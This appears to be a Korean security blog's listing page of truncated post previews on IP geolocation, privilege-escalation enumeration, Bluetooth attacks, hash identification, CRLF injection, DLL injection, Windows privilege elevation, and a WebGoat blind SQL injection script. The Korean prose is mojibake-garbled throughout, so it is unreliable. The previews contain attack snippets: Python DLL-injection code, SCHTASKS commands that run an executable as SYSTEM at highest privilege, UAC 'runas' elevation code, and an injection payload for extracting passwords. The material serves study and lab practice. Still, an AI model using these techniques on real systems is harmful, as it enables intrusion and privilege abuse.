๐ค์ ๋ณด๋ณด์/โค๏ธ๋ ๋ํ
2024.01.05
COUNTRY.IS IP ์ง์๋ฅผ ํตํ ๊ตญ๊ฐ ์กฐํ https://country.is/ IP Geolocation API | Country.is Country has a minimal ๐ฅ interface. Have your browser or app query its own IP address. Query an abitrary IP. https://api.country.is/9.9.9.9 See the data sources. Country automatically checks for new MaxMind data every 24 hours. If you prefer not to use t country.is MAXMIND ASN ๋ฐ IP ๋์ญ ๋ณ ๊ตญ๊ฐ ์ ๋ณด ๋ฐ์ดํฐ ํ์ผ ์ ๊ณต https://www.maxm..
๐ค์ ๋ณด๋ณด์/โค๏ธ๋ ๋ํ
2023.12.19
์ผ๋ฐ์ ์ผ๋ก ํธ์คํธ ์์ ํ๋ํ๋ฉด ์์ ๊ถํ ํ์ทจ๋ฅผ ์ํ์ฌ ์ ๋ณด๋ฅผ ์์งํด์ผํ๋ค. ์ด ์์งํ๋ ํ์๋ฅผ Enumeration๋ผ๊ณ ํ๋ค. ๊ธฐ์ด ์ ๋ณด๋ฅผ ํ๋ํ๊ธฐ ์ํ์ฌ ๋ค์์ ์ ๋ณด๋ฅผ ์์งํ์. ์ด์์ฒด์ ๋ฒ์ - ์ฃผ๋ก ์๋ ค์ง ์ด์์ฒด์ ์ ๋ฐ๋ผ ์ฌ์ฉํ๋ ํด ๋๋ ์ต์คํ๋ก์ ์ฌ๋ถ๋ฅผ ํ์ธํ ์ ์๋ค. ์ปค๋ ๋ฒ์ - ์์๋ ค์ง ์ปค๋์ด๋ผ๋ฉด ์ทจ์ฝ์ ์ ๋ณด๋ฅผ ํ๋ํ ์ ์๋ค. ์ด์ ์ฐ์ด๋ ์ทจ์ฝ์ ์ ์์คํ
์ ์ฌ์ฉ๋ถ๊ฐ ํ ์ ์๊ฒ ํ๋ฏ๋ก ์คํํ๊ธฐ์ ํ๊ธํจ๊ณผ๋ฅผ ์ธ์งํ๋๋ก ํ ์ฑํ์ค์ธ ์๋น์ค - ์คํ์ค์ธ ํ๋ก์ธ์ค์ ๊ถํ์ ํ์ธํ๋ค. ์๋ชป๋ ์ค์ ์ผ๋ก root๋ก ์คํ๋๊ฒ ํ ์๋์๋ค. Cy3erLuna@htb[/htb]$ ps aux | grep root root 1 1.3 0.1 37656 5664 ? Ss 23:26 0:01 /sbin/i..
๐ค์ ๋ณด๋ณด์/โค๏ธ๋ ๋ํ
2023.10.31
๋ฌด์ ๊ธฐ์ ํ์ค์ธ Bluetooth๋ ๊ณ ์ ๋ฐ ๋ชจ๋ฐ์ผ ์ฅ์น์์ ๋จ๊ฑฐ๋ฆฌ๋ก ๋ฐ์ดํฐ๋ฅผ ์ ์กํ๊ธฐ ์ํด ์ค๊ณ๋์์ต๋๋ค. ์ด ๊ธฐ์ ์ 2.402GHz ~ 2.480GHz์ ISM ๋์ญ์์ ๋ฌด์ ์ฃผํ์๋ฅผ ์ฌ์ฉํ์ฌ ๊ฐ์ธ ์์ญ ๋คํธ์ํฌ(PAN)๋ฅผ ๊ตฌ์ถํ๋ ๋ฐฉ์์ผ๋ก ์๋ํฉ๋๋ค ์ฅ์น ๊ฐ ๋จ๊ฑฐ๋ฆฌ ๋ฌด์ ํต์ ์ ์ํด ์ค๊ณ๋ Bluetooth ๊ธฐ์ ์ ์ค๋๋ ์ ๋์งํธ ์๋์ ์ด๋์๋ ์กด์ฌํฉ๋๋ค. ์ด๋ฌํ ํธ๋ฆฌํจ์๋ ๋ถ๊ตฌํ๊ณ ํด์ปค์๊ฒ๋ ์๋ก์ด ๊ณต๊ฒฉ ๋์์ด ๋ ์ ์์ต๋๋ค. ๋ช ๊ฐ์ง ์ ํ์ ๋ธ๋ฃจํฌ์ค ํดํน ์ข
๋ฅ๋ ๋ค์๊ณผ ๊ฐ์ต๋๋ค. ๋ธ๋ฃจ์ค๋ํ(Bluesnarfing): ๋ธ๋ฃจํฌ์ค๋ฅผ ํตํด ๋ฌด์ ๋๋ฐ์ด์ค์ ์ ๋ณด์ ๋ฌด๋จ์ผ๋ก ์ก์ธ์คํ๋ ์ฌ์ด๋ฒ ๊ณต๊ฒฉ์
๋๋ค. ๋ธ๋ฃจ์ฌํน(Bluejacking): ๋ธ๋ฃจํฌ์ค ์ฌ์ฉ ์ฅ์น์ ์์น ์๋ ๋ฉ์์ง๋ฅผ ๋ณด๋ด๋ ๊ณต๊ฒฉ์
๋๋ค. ๋ธ..
๐ค์ ๋ณด๋ณด์/โค๏ธ๋ ๋ํ
2023.06.27
๋๋ถ๋ถ์ ํด์ ์๊ณ ๋ฆฌ์ฆ์ ์ผ์ ํ ๊ธธ์ด์ ํด์๋ฅผ ์์ฑํฉ๋๋ค. ํน์ ํด์์ ๊ธธ์ด๋ ํด์๊ฐ ํด์๋ ์๊ณ ๋ฆฌ์ฆ์ ๋งคํํ๋ ๋ฐ ์ฌ์ฉํ ์ ์์ต๋๋ค. ์๋ฅผ ๋ค์ด 32์ ๊ธธ์ด์ ํด์๋ MD5 ๋๋ NTLM ํด์์ผ ์ ์์ต๋๋ค. ํด์ ๊ฐ์ด ์์ผ๋ฉด hashid๋ก ์ด๋ค ์ ํ์ ํด์์ธ์ง ์ ์ ์๋ค.
๐ค์ ๋ณด๋ณด์/โค๏ธ๋ ๋ํ
2023.06.27
CRLF -> ๋ก๊ทธ ์ธ์ ์
, ๋ก๊ทธ ํฌ์ด์ฆ๋ -> XSS, RCE redirection ์ฒ๋ฆฌ๋๋ ํ๋ผ๋ฏธํฐ์ Response ํจํท์ CRLF ๊ณต๊ฒฉ์ ํตํ์ฌ ์์์ ๋ฐ์ดํฐ(html ๊ตฌ์กฐ ๋ฑ)๋ฅผ ์ฝ์
ํ ์ ์๋ค. ๊ฐํ๋ฌธ์๋ฅผ ์ฝ์
ํ์ฌ ๊ทธ๋๋ก ์์คํ
์์ ์ธ์ํ๋ ๊ฒ์ด ์ทจ์ฝํ๋ค ์ด๋ฅผ ๋ฐฉ์งํ๊ธฐ ์ํด์ URL๋ก ์ธ์ฝ๋ฉ๋๋๋ก ํ์ฌ CRLF ์ธ์ ์
์ ๋ฐฉ์ง ํ๋ค. ์์ ๊ณต๊ฒฉ์ HTTP Request ํจํท์ ํ๋ผ๋ฏธํฐ ๋ฑ์ ์กฐ์ํ์ฌ ์ฌ์ฉ์์๊ฒ ์ค๋ Response ํจํท์ ์๋ต์ ์กฐ์ํ๋ ๋ฐฉ๋ฒ์ด๋ค. ํ
์คํ
ํด๋ก๋ ํ์ด์ฌ์ crlfsuite๋ฅผ ์ฌ์ฉํ๋ฉด ๋๋ค pip3 install crlfsuite KoCOnU72@htb[/htb]$ crlfsuite -h usage: crlfsuite [-h] [-t TARGET] [-iT TARG..
๐ค์ ๋ณด๋ณด์/โค๏ธ๋ ๋ํ
2023.03.15
DLL Injection ๊ณต๊ฒฉ ํ๋ฆ ์คํ ์ค์ธ ํ๋ก์ธ์ค๋ฅผ ๋์์ผ๋ก ํฉ๋๋ค. ํ๋ก์ธ์ค ์ฃผ์ ๊ณต๊ฐ์ ๋ฉ๋ชจ๋ฆฌ๋ฅผ ํ ๋นํฉ๋๋ค. DLL ๊ฒฝ๋ก๋ฅผ ํด๋น ๋ฉ๋ชจ๋ฆฌ์ ์๋๋ค. ๋์ ํ๋ก์ธ์ค์ ์ค๋ ๋์์ DLL์ ๋ก๋ํ๋ ํจ์๋ฅผ ์คํํฉ๋๋ค. import ctypes # ctypes ๋ชจ๋ ์ํฌํธ import sys # sys ๋ชจ๋ ์ํฌํธ import os # os ๋ชจ๋ ์ํฌํธ import psutil # psutil ๋ชจ๋ ์ํฌํธ def inject_dll(target_process_name, dll_path): # ๋์ ํ๋ก์ธ์ค๋ฅผ ์ฐพ์ต๋๋ค. target_pid = None for process in psutil.process_iter(['name', 'pid']): if process.info['name'] == target_..
๐ค์ ๋ณด๋ณด์/โค๏ธ๋ ๋ํ
2022.07.01
ํด๋น ํ์ด์ฌ ํจ์๋ก ์๋์ ๊ฐ์ด ์ต๊ณ ๊ถํ์ ํ๋ก๊ทธ๋จ ์คํ์ ํ ์ ์๋ค. os.system(f'SCHTASKS /Create /TN {SVC_NAME} /SC ONLOGON /TR {SVC_PROG_PATH} /RL HIGHEST') ๋๋ ์ผ๋ฐ ๋ช
๋ น์ด๋ก SCHTASKS /Create /TN "Go" /SC ONSTART /TR "C:\Users\AidenLee\Downloads\go.exe" /RL HIGHEST /RU "SYSTEM" ์์ฉ os.system()์ ์ฌ์ฉํ์ฌ Windows์์ ๊ถํ ์์น์ ์์ฒญํ๋ ๋ฐฉ๋ฒ ์ค ํ๋๋ ์์
์ค์ผ์ค๋ฌ(Task Scheduler)๋ฅผ ์ฌ์ฉํ๋ ๊ฒ์
๋๋ค. ์ด๋ฏธ ์ฌ์ฉํ๊ณ ๊ณ์ SCHTASKS ๋ช
๋ น์ ์ด ๋ฐฉ๋ฒ ์ค ํ๋์
๋๋ค. ์๋๋ ๋ค๋ฅธ ๋ช ๊ฐ์ง ๋ฐฉ๋ฒ์ ์ ๊ณตํฉ๋๋ค. ru..
๐ค์ ๋ณด๋ณด์/โค๏ธ๋ ๋ํ
2022.07.01
์จ๋ผ์ธ์์ ๋ฐ๊ฒฌ๋๋ ๊ธฐ์กด ํ์ด์ฌ ๊ถํ ์์น ์์ฒญ ์ฝ๋์ ๊ฒฝ์ฐ ํจํค์ง ์ด๋ฆ์ด win32com์์ shell์ ์์ฒญํ์ง๋ง 2022๋
๊ธฐ์ค win32comext์ ์กด์ฌํ๋ค. import os import sys # win32com.shell์ด ์๋ win32comext ์ด๋ค from win32comext.shell import shell ASADMIN = 'asadmin' print(sys.argv) if sys.argv[-1] != ASADMIN: script = os.path.abspath(sys.argv[0]) params = ' '.join([script] + sys.argv[1:] + [ASADMIN]) shell.ShellExecuteEx(lpVerb='runas', lpFile=sys.execut..
๐ค์ ๋ณด๋ณด์/โค๏ธ๋ ๋ํ
2019.04.28
import requests password = str() cre = "created" url = "http://localhost:8080/WebGoat/SqlInjection/challenge" cookie = {'JSESSIONID':'8B10E84050C998DD12174E500DBA38F6'} print ('[*] Get password length...') password_length = int() for length in range(1,30): datas = {'username_reg' : "tom' and length(password) = %d and '1'='1" % length, 'email_reg' : 'test@test.com', 'password_reg' : '1111', 'conf..